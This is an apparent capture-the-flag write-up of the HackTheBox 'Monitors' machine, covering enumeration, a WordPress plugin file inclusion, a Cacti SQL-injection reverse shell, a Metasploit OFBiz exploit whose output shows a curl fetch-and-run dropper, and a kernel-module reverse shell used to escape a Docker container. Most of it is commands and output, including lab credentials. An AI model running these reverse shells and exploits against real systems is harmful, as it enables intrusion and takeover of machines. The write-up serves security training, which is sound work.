Monitors - [HTB]

Cover Image for Monitors - [HTB]


Monitors is a hard linux OSCP like machine from HackTheBox where you will several web page vulnerabilities until getting user's creds. Finally, you will have to escape from a docker container, where you will have to exploit some capabilities in order to become root.


As always, let's start finding all opened ports in the machine with nmap.

kali@kali:~/Documents/HTB/Monitors$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt
Nmap scan report for
Host is up (0.048s latency).
Not shown: 65533 closed ports
22/tcp open  ssh
80/tcp open  http

# Nmap done at Sat Jul 24 13:44:49 2021 -- 1 IP address (1 host up) scanned in 55.04 seconds

Then, we continue with a deeper scan of every opened port, getting more information about each service.

kali@kali:~/Documents/HTB/Monitors$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80
Nmap scan report for
Host is up (0.047s latency).

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Accesing to port 80 there we have a message telling us that we can not access to the web server using an IP.

direct ip access is not allowed

Adding the email domain monitors.htb to the /etc/hosts file we can access to the following wordpress page.


Enumerating with wpscan we can obtain all plugins installed.

$ wpscan --url http://monitors.htb/ -e ap,u,cb
[i] Plugin(s) Identified:

[+] wp-with-spritz
 | Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 | Found By: Urls In Homepage (Passive Detection)
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt

The plugin spritz has an LFI / RFI vulnerability.


Thanks to the vulnerability we can obtain the users registered on the system.

marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash

Furthermore, we can obtain the wordpress database cred and other domain.

/** MySQL database username */
define( 'DB_USER', 'wpadmin' );
/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );

# Default virtual host settings
# Add monitors.htb.conf
# Add cacti-admin.monitors.htb.conf

Adding the domain cacti-admin.monitors.htb into the /etc/hosts we can access to the cacti login form.


We can login as admin with the Mysql database password.

The cacti version 1.2.12 has an associated exploit allowing us to obtain a reverse shell as the user www-data.

kali@kali:~/Documents/HTB/Monitors$ python3 -t http://cacti-admin.monitors.htb -u admin -p 'BestAdministrator@2020!' --lhost --lport 443
[+] Connecting to the server...
[+] Retrieving CSRF token...
[+] Got CSRF token: sid:ac3fbf8f5163e68c4ded3c22646f2ca5a6c3961b,1627157074
[+] Trying to log in...
[+] Successfully logged in!

[+] SQL Injection:

[+] Check your nc listener!
kali@kali:~/Documents/HTB/Monitors$  nc -lnvp 443
listening on [any] 8787 ...
connect to [] from (UNKNOWN) [] 36118
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation 1

Enumerating the file system appears a cacti service file, which executes a file inside marcu's home folder.

www-data@monitors:/$ find / -name "cacti*" 2>/dev/null
www-data@monitors:/$ cat /etc/systemd/system/cacti-backup.service

Reading this file we can obtain a password.

www-data@monitors:/home/marcus/.backup$ cat /home/marcus/.backup/


zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name}${backup_name}.zip
rm /tmp/${backup_name}.zip

This password can be used to become become marcus, getting the user flag.

www-data@monitors:~$ su marcus
Password: VerticalEdge2020
marcus@monitors:~/.backup$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
marcus@monitors:~$ cat user.txt

Privilege Escalation 2

Executing linpeas appears the port 8443 listening for localhost.

tcp        0      0*               

We can access to it using SSH port forwarding.

kali@kali:~/Documents/HTB/Monitors$ ssh marcus@ -L -fN

Accessing the port with firefox through the protocol HTTPS we get a Tomcat error, showing the Tomcat's version (9.0.31). Looking for associated vulns we can obtain a metasploit module apache_ofbiz_deserialization.

msf6 > use exploit/linux/http/apache_ofbiz_deserialization
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set rhosts
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lhost
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lport 4444
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set forceexploit true
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > show options

Module options (exploit/linux/http/apache_ofbiz_deserialiation):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8443             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper

msf6 exploit(linux/http/apache_ofbiz_deserialiation) > run

[*] Started reverse TCP handler on 
[*] Executing automatic check (disable AutoCheck to override)
[!] The target is not exploitable. Target cannot deserialize arbitrary data. ForceExploit is enabled, proceeding with exploitation.
[*] Executing Linux Dropper for linux/x86/shell/reverse_tcp
[*] Using URL:
[*] Local IP:
[+] Successfully executed command: sh -c curl${IFS}-so${IFS}/tmp/RXsgDGlc${IFS};chmod${IFS}+x${IFS}/tmp/RXsgDGlc;/tmp/RXsgDGlc;rm${IFS}-f${IFS}/tmp/RXsgDGlc
[*] Client (curl/7.64.0) requested /re6R4gMz4969w
[*] Sending payload to (curl/7.64.0)
[*] Command Stager progress - 103.95% done (158/152 bytes)
[*] Sending stage (36 bytes) to
[*] Command shell session 1 opened ( -> at 2021-07-25 18:54:45 +0200
[*] Server stopped.

uid=0(root) gid=0(root) groups=0(root)

Now, we are inside a docker container with some capabilities.

root@77ff21ad5db2:/tmp/temp# capsh --print
capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)

Between all of them, stands out the capabilit CAP_SYS_MODULE, allowing us to become root in the machine following this post.

Going to the point, you need to create these files. (You can download them from your kali machine)

Note: Do not forget to change the IP for you kali's machine and the identation in the Makefile MUST be tabs.

root@77ff21ad5db2:/tmp/temp# cat reverse-shell.c
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_DESCRIPTION("LKM reverse shell module");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/ 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");

root@77ff21ad5db2:/tmp/temp# cat Makefile
obj-m +=reverse-shell.o
        make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) modules
        make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) clean

Then, execute the make command in the same directory as the files are stored, obtaining the following output.

root@77ff21ad5db2:/tmp/temp# make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp/temp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /tmp/temp/reverse-shell.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /tmp/temp/reverse-shell.mod.o
  LD [M]  /tmp/temp/reverse-shell.ko
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'

Finally, listen with nc at port 4445 and execute the final command.

root@77ff21ad5db2:/tmp/temp# insmod reverse-shell.ko
insmod reverse-shell.ko

kali@kali:~/Documents/HTB/Monitors$ nc -nlvp 4445
listening on [any] 4445 ...
connect to [] from (UNKNOWN) [] 37878
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@monitors:/# cat /root/root.txt